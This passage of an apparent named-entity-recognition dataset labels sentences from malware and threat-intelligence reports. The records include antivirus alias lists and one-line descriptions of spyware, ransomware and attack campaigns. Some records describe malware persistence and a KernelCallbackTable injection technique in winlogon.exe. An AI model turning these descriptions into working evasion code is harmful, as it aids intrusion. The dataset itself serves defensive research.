"ORGANIZATION: military": [[74, 82]]}, "info": {"id": "cyner2_train_007026", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-PWS/W32.WebGame.65536.HV TrojanDownloader.Kolilks.B5 Trojan/Scar.cavw Trojan.Graftor.Elzob.D3707 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Dropper Win32/SillyDl.HER TROJ_DLOADE.SMEP Trojan.Win32.Scar.bxwdr Trojan.DownLoad1.2460 TROJ_DLOADE.SMEP W32.Malware.Downloader Trojan/Win32.Scar TrojanDownloader:Win32/Kolilks.B Trojan.Win32.A.Scar.48640.J Trojan/Win32.Scar.R4127 TrojanDownloader.BHO Worm.Win32.Kolios.a Trojan-Downloader.Win32.Kolilks W32/Mdrop.EB!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007027", "source": "cyner2_train"}} {"text": "Stealing FTP credentials and browser cookies", "spans": {}, "info": {"id": "cyner2_train_007028", "source": "cyner2_train"}} {"text": "In this campaign, a PDF file with an embedded JavaScript is used to download the payload from a Google Drive shared link.", "spans": {"THREAT_ACTOR: campaign,": [[8, 17]], "MALWARE: the payload": [[77, 88]], "SYSTEM: 
Google Drive": [[96, 108]]}, "info": {"id": "cyner2_train_007029", "source": "cyner2_train"}} {"text": "With the new architecture, PluginPhantom achieves more flexibility to update its modules without reinstalling apps.", "spans": {"SYSTEM: architecture,": [[13, 26]], "MALWARE: PluginPhantom": [[27, 40]], "SYSTEM: apps.": [[110, 115]]}, "info": {"id": "cyner2_train_007031", "source": "cyner2_train"}} {"text": "A backdoor also known as: Pwstool.Netpass Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32.Riskware.WebBrowserPassView.A Riskware.Win32.PassView.eqrnrb Tool.PassView.1871 BehavesLike.Win32.Dropper.gc PSWTool.NetPass.gh RiskWare[PSWTool]/Win32.NetPass PUP.Optional.PasswordViewer Riskware.PSWTool! Win32/Virus.PSW.a52", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007032", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnGameERALV.Trojan Trojan/W32.Loader.36932 Trojan.Win32.Loader!O Trojan.Myma.A3 Trojan.Loader.Win32.2 Troj.W32.Loader.c!c Trojan/Loader.c Trojan.Graftor.D51D2 Win32.Trojan.Loader.b Backdoor.Trojan Win32/Loader.B TROJ_LOADER.SMIA Win.Trojan.Starter-291 Trojan.Win32.Loader.c Trojan.Win32.Loader.bwzwn Trojan.Win32.A.Loader.36864 Trojan.Loader.575 TROJ_LOADER.SMIA Trojan/Loader.b Backdoor.Trojan TR/Loader.C Trojan/Win32.Loader Trojan:Win32/Loader.WOD Trojan.Win32.Loader.c Trojan/Win32.Loader.R4213 Trojan.Loader Trj/Loader.B Trojan.Win32.Loader.cc Trojan.Loader!V/30nEGDEMU Trojan.Win32.LOADER W32/LOADER.C!tr Trojan.PSW.Win32.QQPass.D", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007034", "source": "cyner2_train"}} {"text": "This app carries a number of the capabilities : Upload GSM , WhatsApp , Telegram , Facebook , and Threema messages Upload voice notes , contacts stored , accounts , call logs , location information , and images Upload the expanded list of collected device information ( e.g. 
, IMEI , product , board , manufacturer , tag , host , Android version , application version , name , model brand , user , serial , hardware , bootloader , and device ID ) Upload SIM information ( e.g. , IMSI , operator code , country , MCC-mobile country , SIM serial , operator name , and mobile number ) Upload wifi information ( e.g. , SSID , wifi speed , and MAC address ) Upload other information ( e.g. , display , date , time , fingerprint , created at , and updated at ) The app is capable of stealing messages from popular messaging apps by abusing the notification permissions to read the notification content and saving it to the database .", "spans": {"SYSTEM: GSM": [[55, 58]], "SYSTEM: WhatsApp": [[61, 69]], "SYSTEM: Telegram": [[72, 80]], "SYSTEM: Facebook": [[83, 91]], "SYSTEM: Threema": [[98, 105]], "SYSTEM: Android": [[330, 337]]}, "info": {"id": "cyner2_train_007036", "source": "cyner2_train"}} {"text": "A backdoor also known as: TROJ_FAM_00005ae.TOMA Win32.Trojan-Downloader.Small.bh W32/Downldr2.GMBK TROJ_FAM_00005ae.TOMA Win.Downloader.77716-1 Trojan.Win32.DownLoad.cvxyj Trojan.DownLoad.50492 Backdoor.CPEX.Win32.14166 W32/Downloader.FCDJ-0388", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007037", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.FraudPack.30252 Trojan.Win32.FraudPack!O TjnDownldr.Ladivyrop.S79502 Win32.Trojan.WisdomEyes.16070401.9500.9993 Trojan.Win32.FraudPack.aie Trojan.Win32.FraudPack.cysfht Trojan.FraudPack.Win32.31030 BehavesLike.Win32.Dropper.mc Trojan-Downloader.Win32.Adload Trojan/FraudPack.anzn Trojan.Kazy.D5D389 Trojan.Win32.FraudPack.aie TrojanDownloader:Win32/Ladivyrop.A Trojan.FraudPack Trojan.FraudPack!cVlSVwD6LBI", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007038", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.F2DC Trojan.JS.StartPage!O Win32.Trojan.WisdomEyes.16070401.9500.9691 W32/Meredrop.MBVJ-0788 
HV_STARTPAGE_CA223323.TOMC Trojan.JS.StartPage.dv Trojan.JS.StartPage.dv Trojan.Script.Ocyt.cqtcgb Trojan.StartPage.35625 Trojan.Win32.Meredrop BehavesLike.Win32.RansomTescrypt.nc Trojan.JS.IEstart W32/Meredrop.DRO Trojan/JS.te W32.Trojan.Meredrop Win32.Troj.Undef.kcloud Trojan:JS/Ociyota.A Trojan.JS.StartPage.dv Trojan/Win32.StartPage.C53044 Trojan.Win32.Meredrop Trojan.Meredrop!IA1ZWY8Gf9I W32/StartPage.IMA!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007039", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.BlackEnergy.Trojan Trojan/W32.Small.27648.MW Trojan.Win32.Jorik.Tedroo!O Trojan.Mauvaise.SL1 Win32.Trojan.BlackEnergy.b Backdoor.Win32.BlackEnergy.d Backdoor.Win32.A.Kbot.27648.B TrojWare.Win32.Rootkit.BlackEnergy.AC Trojan-Downloader.Win32.Phdet Backdoor/Kbot.ara Trojan[Backdoor]/Win32.Kbot TrojanDownloader:Win32/Phdet.E Backdoor.Win32.BlackEnergy.d Backdoor/Win32.Kbot.R47968 Backdoor.BlackEnergy Backdoor.Kbot!JCoulsYcyBQ W32/BlackEnergy.AC!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007041", "source": "cyner2_train"}} {"text": "Several papers have been published about the group's operations, but until the Epic Turla research was published by Kaspersky Lab, little information was available about the more unusual aspects of their operations, such as the first stages of infection through watering-hole attacks.", "spans": {"THREAT_ACTOR: group's": [[45, 52]], "THREAT_ACTOR: Epic Turla": [[79, 89]], "ORGANIZATION: Kaspersky Lab,": [[116, 130]]}, "info": {"id": "cyner2_train_007042", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clodfcc.Trojan.046a TrojanDownloader.Halocy Win32.Trojan.WisdomEyes.16070401.9500.9785 Trojan.Win32.Palibu.ekyevo Troj.Banker.W32.Palibu!c BehavesLike.Win32.Dropper.vh W32/Trojan.JGOQ-7647 TR/Spy.Banker.ysyj W32/Delf.BUL!tr.dldr TrojanDownloader:Win32/Halocy.B!bit Trojan/Win32.Banload.C1318047 Trojan.DL.Delf!CR51fUDm05E 
Trojan.Spy.Banker Trj/CI.A Win32/Trojan.ca7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007043", "source": "cyner2_train"}} {"text": "In this post, we are going to explain how Dridex gain persistence in the system and how Dridex performs AtomBombing in detail.", "spans": {"MALWARE: Dridex": [[42, 48], [88, 94]], "SYSTEM: the system": [[69, 79]]}, "info": {"id": "cyner2_train_007044", "source": "cyner2_train"}} {"text": "Two of these victims were under the protection of Managed Defense who identified and responded to the threat before significant impact occurred.", "spans": {"ORGANIZATION: Managed Defense": [[50, 65]], "MALWARE: the threat": [[98, 108]]}, "info": {"id": "cyner2_train_007047", "source": "cyner2_train"}} {"text": "A backdoor also known as: TROJ_SAMSA.H Win32.Trojan.WisdomEyes.16070401.9500.9936 W32/Trojan.XHGP-7520 Win32/SillyDl.GBZ TROJ_SAMSA.H Win.Trojan.Inject-46 Trojan.Win32.Samsa.rznk Trojan.Win32.A.Samsa.53248 Troj.W32.Samsa.e!c Backdoor:W32/Enfal.K BackDoor.Mask Trojan-Ransom.SamSam W32/Trojan.BDWY Trojan/PSW.Almat.vn TR/Enfal.F Trojan/Win32.Enfal Win32.Troj.Samsa.d.kcloud Trojan.Symmi.D100E7 Trojan:Win32/Samsa.A Trojan.Win32.Samsa.aw Trj/Qhost.ER Win32.Trojan.Invader.Duml W32/Samsa.H!tr Win32/Trojan.e6d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007048", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Scar.dxkn Trojan.Win32.Scar.ecdkn Scar.HF TROJ_SCAR_000002b.TOMA Trojan.Win32.Scar.dxkn Trojan.Scar!44JrqMeLFEQ BackDoor.IRC.Bot.947 SPR/Tool.271360 TROJ_SCAR_000002b.TOMA Trojan/Scar.abjq Backdoor:Win32/ProxyBot.D Trojan/Win32.Scar Win32/CryptExe.A Trj/Scar.AL", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007050", "source": "cyner2_train"}} {"text": "In this blog, we will discuss how the TinyV Trojan spreads and how it works.", "spans": {}, "info": {"id": "cyner2_train_007052", "source": "cyner2_train"}} {"text": "Akamai researchers on 
the Security Intelligence Response Team SIRT have discovered a new Go-based, DDoS-focused botnet.", "spans": {"ORGANIZATION: Akamai researchers": [[0, 18]], "ORGANIZATION: the Security Intelligence Response Team SIRT": [[22, 66]], "MALWARE: Go-based, DDoS-focused botnet.": [[89, 119]]}, "info": {"id": "cyner2_train_007053", "source": "cyner2_train"}} {"text": "By analyzing Trigona ransomware binaries and ransom notes obtained from VirusTotal, as well as information from Unit 42 incident response, we determined that Trigona was very active during December 2022, with at least 15 potential victims being compromised.", "spans": {"MALWARE: Trigona ransomware": [[13, 31]], "ORGANIZATION: VirusTotal,": [[72, 83]], "ORGANIZATION: Unit 42": [[112, 119]], "MALWARE: Trigona": [[158, 165]], "ORGANIZATION: potential victims": [[221, 238]]}, "info": {"id": "cyner2_train_007054", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.SayokaroiEA.Trojan Worm.Hilgild.A4 Troj.Banker.W32.Tinba.mAnM Trojan.Symmi.DB2FC W32.SillyFDC WORM_HILGIL.SMRP Trojan.Win32.Hesv.avgr Win32.Trojan.Hesv.Wwok TrojWare.Win32.Hilgild.AKO BackDoor.Nethief.310 WORM_HILGIL.SMRP Worm:Win32/Hilgild.A Trojan.Win32.Hesv.avgr Worm.Win32.Hilgild.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007055", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Deshacop.195072 Ransomware.ShinoLock.A3 Ransom.ShinoLocker.MSIL Trojan.Ransom.Shinolock.5 Ransom_SHINOLOCK.SMI0 Win32.Trojan.WisdomEyes.16070401.9500.9975 Ransom_SHINOLOCK.SMI0 Trojan.Win32.Ransom.195074 Trojan.DownLoader22.15733 Trojan.Win32.Filecoder Trojan.Deshacop.rk Ransom:MSIL/ShinoLock.A Trj/GdSda.A Trojan-Ransom.Win32.ShinoLocker.a Trojan.Deshacop!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007058", "source": "cyner2_train"}} {"text": "The Dukes primarily target Western governments and related organizations, suchas government ministries and agencies, political 
think tanks, and governmental subcontractors.", "spans": {"THREAT_ACTOR: The Dukes": [[0, 9]], "ORGANIZATION: Western governments": [[27, 46]], "ORGANIZATION: organizations,": [[59, 73]], "ORGANIZATION: government ministries": [[81, 102]], "ORGANIZATION: agencies, political think tanks,": [[107, 139]], "ORGANIZATION: governmental subcontractors.": [[144, 172]]}, "info": {"id": "cyner2_train_007060", "source": "cyner2_train"}} {"text": "Over the last few weeks, we collaborated with ClearSky and uncovered several indicators that were researched and found to be related to a new hacking campaign targeting large Vietnamese organisations.", "spans": {"ORGANIZATION: ClearSky": [[46, 54]], "THREAT_ACTOR: new hacking campaign": [[138, 158]], "ORGANIZATION: Vietnamese organisations.": [[175, 200]]}, "info": {"id": "cyner2_train_007062", "source": "cyner2_train"}} {"text": "The critically acclaimed show focuses on a fictional group of political hacktivists, and follows a young cybersecurity engineer called Elliot Alderson who suffers from social anxiety disorder and forms connections through hacking.", "spans": {}, "info": {"id": "cyner2_train_007063", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Sartmob.r3 Trojan.StartPage!bEEY6Bd79s4 Trojan.Zbot Trojan.MSIL.StartPage.az Trojan.Win32.StartPage.cvohfz Trojan.StartPage.61440 W32/Trojan.CBVH-4150 Trojan/MSIL.bjlms.aigeayx Trojan/MSIL.StartPage Trojan:MSIL/Sartmob.A Trojan.MSIL.StartPage Trj/CI.A MSIL/StartPage.AD Msil.Trojan.Startpage.Efus Trojan.MSIL2 W32/StartPage.AZ!tr MSIL2.BIFV Trojan.MSIL.StartPage.az Win32/Trojan.Dropper.a9c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007065", "source": "cyner2_train"}} {"text": "Before connecting with the socket , it creates a malware environment in ‘ APPDATA/myupd ’ and creates a sqlite3 database there – ‘ myupd_tmp\\\\mng.db ’ : CREATE TABLE MANAGE ( ID INT PRIMARY KEY NOT NULL , Send INT NOT NULL , Keylogg INT NOT NULL , 
Screenshot INT NOT NULL , Audio INT NOT NULL ) ; INSERT INTO MANAGE ( ID , Send , Keylogg , Screenshot , Audio ) VALUES ( 1 , 1 , 1 , 1 , 0 ) Finally , the malware modifies the ‘ Software\\Microsoft\\Windows\\CurrentVersion\\Run ’ registry key to enable autostart of the main module .", "spans": {}, "info": {"id": "cyner2_train_007068", "source": "cyner2_train"}} {"text": "A backdoor also known as: Heuristic_Anomaly.A TROJ_TRACUR.SMVD Trojan:Win32/Chroject.D!dll Trojan.Win32.Kryptik.bCOPL Trojan.Win32.Crypt W32/Kryptik.COPL!tr Crypt3.BBGH", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007069", "source": "cyner2_train"}} {"text": "The Linux VENOM rootkit is a two-component malicious software aimed at maintaining unauthorized access on compromised Linux systems.", "spans": {"MALWARE: The Linux VENOM rootkit": [[0, 23]], "MALWARE: two-component malicious software": [[29, 61]], "SYSTEM: Linux systems.": [[118, 132]]}, "info": {"id": "cyner2_train_007070", "source": "cyner2_train"}} {"text": "This report describes the latest iteration in a long-running espionage campaign against the Tibetan community.", "spans": {"THREAT_ACTOR: espionage campaign": [[61, 79]], "ORGANIZATION: Tibetan community.": [[92, 110]]}, "info": {"id": "cyner2_train_007071", "source": "cyner2_train"}} {"text": "While we do not have detailed telemetry, we have reason to believe this attack targeted an individual at a public utilities company in the Middle East.", "spans": {"SYSTEM: telemetry,": [[30, 40]], "ORGANIZATION: individual": [[91, 101]], "ORGANIZATION: public utilities company": [[107, 131]]}, "info": {"id": "cyner2_train_007072", "source": "cyner2_train"}} {"text": "It is also a keylogger and can take screenshots.", "spans": {}, "info": {"id": "cyner2_train_007073", "source": "cyner2_train"}} {"text": "Tordow 2.0 can make telephone calls, control SMS messages, download and install programs, steal login credentials, access contacts, encrypt files, visit webpages, 
manipulate banking data, remove security software, reboot a device, rename files, and act as ransomware.", "spans": {"MALWARE: Tordow 2.0": [[0, 10]], "MALWARE: ransomware.": [[256, 267]]}, "info": {"id": "cyner2_train_007074", "source": "cyner2_train"}} {"text": "The 3102 payload used in this attack also appears to be related to the Evilgrab payload delivered in the watering hole attack hosted on the President of Myanmar's website in May 2015.", "spans": {"MALWARE: The 3102 payload": [[0, 16]], "MALWARE: Evilgrab payload": [[71, 87]], "ORGANIZATION: the President of Myanmar's": [[136, 162]]}, "info": {"id": "cyner2_train_007076", "source": "cyner2_train"}} {"text": "Since August 1, Palo Alto Networks WildFire has captured over 18,000 Android apps that contain this library.", "spans": {"ORGANIZATION: Palo Alto Networks": [[16, 34]], "SYSTEM: WildFire": [[35, 43]], "MALWARE: Android apps": [[69, 81]], "VULNERABILITY: library.": [[100, 108]]}, "info": {"id": "cyner2_train_007077", "source": "cyner2_train"}} {"text": "APT-C-61 Tengyun Snake organization is an APT organization mainly active in South Asia.", "spans": {"THREAT_ACTOR: APT-C-61 Tengyun Snake organization": [[0, 35]], "THREAT_ACTOR: APT organization": [[42, 58]]}, "info": {"id": "cyner2_train_007079", "source": "cyner2_train"}} {"text": "The attachment instead tries to download a template file over an SMB connection so that the user s credentials can be silently harvested.", "spans": {}, "info": {"id": "cyner2_train_007082", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Dokstormac Trojan.Downloader Trojan.Injector.Win32.137915 Trojan/Injector.upj Backdoor.Arcomrat TSPY_DOKSTORMAC_BK220249.TOMC Win.Trojan.7639863-1 Trojan.Win32.Pakes.vtl Trojan.Win32.Pakes.bbujhs BackDoor.Minirat TSPY_DOKSTORMAC_BK220249.TOMC BehavesLike.Win32.AdwareDealPly.fc BDS/Dokstormac.A.1 Backdoor:Win32/Dokstormac.A Trojan.Win32.Pakes.vtl Trojan/Win32.Pakes.R39576 Trojan-Injector.61205 Win32/Fynloski.AA 
Trojan.Injector!2nop4664l2U Backdoor.Win32.Dokstormac RAT.Arcom", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007083", "source": "cyner2_train"}} {"text": "With access to business critical information, senior executives and consultants are often said to be valuable targets for threat actors tasked with obtaining sensitive business secrets.", "spans": {}, "info": {"id": "cyner2_train_007084", "source": "cyner2_train"}} {"text": "Yoroi ZLab has discovered evidence of new campaign utilizing different tactics, including more complex delivery mechanisms and victimology, which began in April, 2022.", "spans": {"ORGANIZATION: Yoroi ZLab": [[0, 10]], "THREAT_ACTOR: campaign": [[42, 50]]}, "info": {"id": "cyner2_train_007086", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Unruy.5 Win32.Trojan.Kryptik.ak Trojan.ADH.2 Trojan.Win32.Crypted.bbxiyv Backdoor.Win32.A.Banito.73728.A Trojan.Scar.Win32.47454 BehavesLike.Win32.Downloader.fc Trojan-Downloader.Win32.Bulilit Trojan/Scar.ajgx Trojan:Win32/Tript.A Trojan/Win32.ADH.C261975 TScope.Malware-Cryptor.SB Win32.Trojan.Deepscan.Wnlw Trojan.DL.Unruy!ze+OfqNv7J8 Win32/Trojan.PSW.ea7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007087", "source": "cyner2_train"}} {"text": "While still compromised, the ARC website also hosted an archive with the filename: the 3rd ASEAN Defence Ministers' Meeting.rar.", "spans": {"VULNERABILITY: compromised,": [[12, 24]]}, "info": {"id": "cyner2_train_007088", "source": "cyner2_train"}} {"text": "AgentTesla is a fairly popular keylogger built using the Microsoft .NET Framework and has shown a substantial rise in usage over the past few months.", "spans": {"MALWARE: AgentTesla": [[0, 10]], "MALWARE: keylogger": [[31, 40]], "SYSTEM: the Microsoft .NET Framework": [[53, 81]]}, "info": {"id": "cyner2_train_007090", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.EliteWrap!O 
Trojan/Dropper.EliteWrap.103 Win32.Trojan.WisdomEyes.16070401.9500.9872 Win32/EliteWrap.103 Trojan-Dropper.Win32.EliteWrap.103 Trojan.Win32.EliteWrap.cstdvv TrojWare.Win32.EliteWrap.103 Trojan.MulDrop.19 Dropper.EliteWrap.Win32.6 Trojan-Dropper.Win32.EliteWrap TrojanDropper.Win32.EliteWrap.103 Trojan[Dropper]/Win32.EliteWrap Win32.Troj.ElitWrap.kcloud Trojan.Graftor.D934B Trojan-Dropper.Win32.EliteWrap.103 TrojanDropper:Win32/Elitewrap.A Trojan/Win32.HDC.C67537 TrojanDropper.EliteWrap Trojan.DR.EliteWrap!+qx1E/0nG5w W32/Multidr.E!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007091", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Qhost Trojan/KillProc.b Win.Trojan.4904185-1 Trojan.Inject.10975 Trojan.Win32.FakeAV TR/Qhost.DK.1 W32/Qhost.BE!tr Trojan:Win64/Qhost.DK Trj/CI.A Win32/Trojan.1ea", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007092", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Glomaru.10240 Trojan.Mauvaise.SL1 Trojan.Win32.Glomaru.a Trojan.Win32.FraudLoad.egvymu Troj.W32.Dialer.lwu8 Win32.Trojan.Glomaru.Wozz TrojWare.Win32.Glomaru.A Trojan.DownLoader23.35677 Trojan.Glomaru.a TR/FraudLoad.poenc Trojan.Zusy.D3521C Trojan.Win32.Glomaru.a Win32.Trojan.Small.P Trojan.Glomaru", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007095", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.Small.43520.J Backdoor.Win32.PcClient!O Backdoor.Pcclient.19199 Backdoor.PcClient.Win32.16939 Trojan/PcClient.ngo Trojan.Tsaisda.1 Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan Win32/PcClient.BIJ Win.Trojan.PcClient-5088 Trojan.Win32.Pcclient.cqndw Backdoor.Win32.A.PcClient.43520 Backdoor.W32.Hupigon.kYKa TrojWare.Win32.PcClient.NOP BackDoor.PcClient.5363 Trojan.FraudPack Backdoor/PcClient.aesj W32.Tsaisda.A BDS/Pcclient.AL Trojan[Backdoor]/Win32.PcClient Backdoor:Win32/Tsaisda.A Trojan/Win32.PcClient.R25878 
Backdoor.PcClient Backdoor.PcClient!ID9InYPBgAg W32/PcClient.GG!tr Win32/Backdoor.fa2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007096", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.8048 Win32.Nemim.A Win32.Trojan.WisdomEyes.16070401.9500.9999 HT_GARVEEP_FI060DBE.UVPM Win32.Nemim.A Win32.Pioneer.C Virus.Win32.Pioneer.e Win32.Nemim.A Win32.Nemim.A BehavesLike.Win32.Ramnit.th Virus.Win32.Nemim TR/Taranis.3944 TrojanDownloader:Win32/Garveep.D Win32.Nemim.A W32.Pioneer.mv7p Win32.Nemim.A Win32.Nemim.A Win32/Nemim.B Trojan.DownLoader! W32/Nemim.B Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007098", "source": "cyner2_train"}} {"text": "Given what we ve seen previously with Vawtrak, simply switching to HTTPS is not a major update in terms of development -- but it does show that the threat actors are interested in protecting their C2 communications.", "spans": {"MALWARE: Vawtrak,": [[38, 46]], "THREAT_ACTOR: threat actors": [[148, 161]]}, "info": {"id": "cyner2_train_007099", "source": "cyner2_train"}} {"text": "Most recently, we have observed the same group targeting military and aerospace interests in Russia and Belarus.", "spans": {"THREAT_ACTOR: the same group": [[32, 46]], "ORGANIZATION: military": [[57, 65]], "ORGANIZATION: aerospace": [[70, 79]]}, "info": {"id": "cyner2_train_007102", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Meciv Win32/Pucedoor.A Trojan.Enfal-11 Application.Win32.BlkIC.IMG Trojan.MulDrop1.40578 TR/Spy.174210 Trojan.Heur.E0B301 Backdoor:Win32/Meciv.A Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007103", "source": "cyner2_train"}} {"text": "This current variant includes a link to the following payment onion website: http://zvnvp2rhe3ljwf2m[.]onion.", "spans": {}, "info": {"id": "cyner2_train_007104", "source": "cyner2_train"}} {"text": "TV5Monde was taken off air in April 2015.", 
"spans": {"ORGANIZATION: TV5Monde": [[0, 8]]}, "info": {"id": "cyner2_train_007105", "source": "cyner2_train"}} {"text": "Kaspersky Some time ago while tracking Winnti group activity we came across a suspicious 64-bit sample.", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: Winnti group": [[39, 51]]}, "info": {"id": "cyner2_train_007106", "source": "cyner2_train"}} {"text": "The group discussed in this white paper is part of this new trend.", "spans": {}, "info": {"id": "cyner2_train_007108", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.3E85 Backdoor.Win32.Nepoe!O Dropper.Paradrop.Win32.108 W32/Korgo.worm PE_AGOBOT.AQM Win32.Trojan.WisdomEyes.16070401.9500.9889 W32/Bobax.AO W32.Bleshare PE_AGOBOT.AQM Win.Trojan.Poebot-45 Trojan-Dropper.Win32.Paradrop.a Trojan.Win32.Paradrop.xhlx Dropper.Paradrop.180736 Troj.Dropper.W32.Paradrop.kYTK TrojWare.Win32.TrojanDropper.Paradrop.a0 Trojan.MulDrop.2267 BehavesLike.Win32.Conficker.cc Backdoor.Win32.PoeBot.C W32/Bobax.LVYX-1108 TrojanDropper.Paradrop TR/Drop.Paradro.a.3 Trojan[Backdoor]/Win32.Agobot TrojanDropper:Win32/Paradrop.J Trojan-Dropper.Win32.Paradrop.a W32/Polybot.dr Backdoor.PoeBot Trj/Droppofonic.A Win32/TrojanDropper.Paradrop.A Worm.PoeBot.S W32/Paradrop.B!tr.dr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007109", "source": "cyner2_train"}} {"text": "This blog will provide an analysis of the Bookworm Trojan and known indicators of compromise.", "spans": {"MALWARE: Bookworm Trojan": [[42, 57]]}, "info": {"id": "cyner2_train_007112", "source": "cyner2_train"}} {"text": "Copy the stage 5 DLL into winlogon.exe Allocate a chunk of memory in winlogon.exe process and copy the same APC routine seen previously Read and save the original pointer of the __fnDWORD internal User32 routine ( located at offset +0x10 of the KernelCallbackTable ) and replace this pointer with the address of the APC stub routine After this function pointer hijacking , when 
winlogon.exe makes any graphical call ( GDI ) , the malicious code can execute without using CreateRemoteThread or similar triggers that are easily detectable .", "spans": {}, "info": {"id": "cyner2_train_007114", "source": "cyner2_train"}} {"text": "SentinelLabs analyzed several iterations of AlienFox, a comprehensive toolset for harvesting credentials for multiple cloud service providers.", "spans": {"ORGANIZATION: SentinelLabs": [[0, 12]], "ORGANIZATION: AlienFox,": [[44, 53]], "MALWARE: toolset": [[70, 77]], "SYSTEM: cloud service providers.": [[118, 142]]}, "info": {"id": "cyner2_train_007115", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnGamesLTPGOWF.Trojan Trojan/W32.Small.35840.NP Backdoor.Win32.Floder!O Backdoor/Floder.rlw Win32/Tnega.ANRP Backdoor.Win32.A.Floder.37376[UPX] Trojan.MulDrop1.37252 Backdoor/Floder.age Trojan[Backdoor]/Win32.Floder Backdoor:Win32/RDPopen.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007119", "source": "cyner2_train"}} {"text": "The remaining 99 C C servers were duplicated configurations from different APKs. 
This is likely due to configuration files being hardcoded within the APK, and old spam campaigns infecting different users, thus, old configurations still being detected in the wild.", "spans": {"SYSTEM: APKs.": [[75, 80]], "SYSTEM: APK,": [[150, 154]], "THREAT_ACTOR: old spam campaigns": [[159, 177]], "ORGANIZATION: users,": [[198, 204]]}, "info": {"id": "cyner2_train_007120", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom_Ciluf.R002C0DL517 Win32.Trojan.WisdomEyes.16070401.9500.9967 Ransom_Ciluf.R002C0DL517 BehavesLike.Win32.Backdoor.ct W32/Trojan.QHYA-4995 Ransom:Win32/Ciluf.A Ransom.Lucifer Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007122", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.Tiny.3072 Backdoor.Win32.Tiny!O Backdoor.Tiny BackDoor-IQ.b Troj.Dropper.W32.Small.l6P3 Backdoor/Tiny.c Win32.Trojan.WisdomEyes.16070401.9500.9646 Backdoor.Trojan BKDR_IQ.B Backdoor.Win32.Tiny.c Backdoor.Win32.Tiny.6144 BackDoor.Tiny.40 BKDR_IQ.B BackDoor-IQ.b Backdoor/Tiny.aw TR/Tiny.nmclh Trojan[Backdoor]/Win32.Tiny.c Trojan.Zusy.Elzob.804 Backdoor.Win32.Tiny.c Backdoor:Win32/Tiny.FBC Win-Trojan/IQ.B Backdoor.Win32.Small.Epi Bck/Tiny.B Win32.Backdoor.Tiny.Pcsz Backdoor.Win32.Tiny BDoor.IQ!tr.bdr Win32/Trojan.d37", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007123", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Nofear.C W32.W.Fearso.kYUv W32/Fearso.c Win32.Worm.Farex.a W32/Worm.AEST W32.Nofer.A@mm win32/Nofear.A Win.Worm.Fearso-2 Email-Worm.Win32.Fearso.c Trojan.Win32.Fearso.cssoyh I-Worm.Win32.A.Fearso.86541 Worm.Win32.Fearso.~BAAA Trojan.AVKill.9837 Worm.Fearso.Win32.9 BehavesLike.Win32.Nofear.mh Backdoor.Win32.Gobot W32/Worm.ENOQ-1581 I-Worm/Fearso.c Worm:Win32/Nofear.C@mm 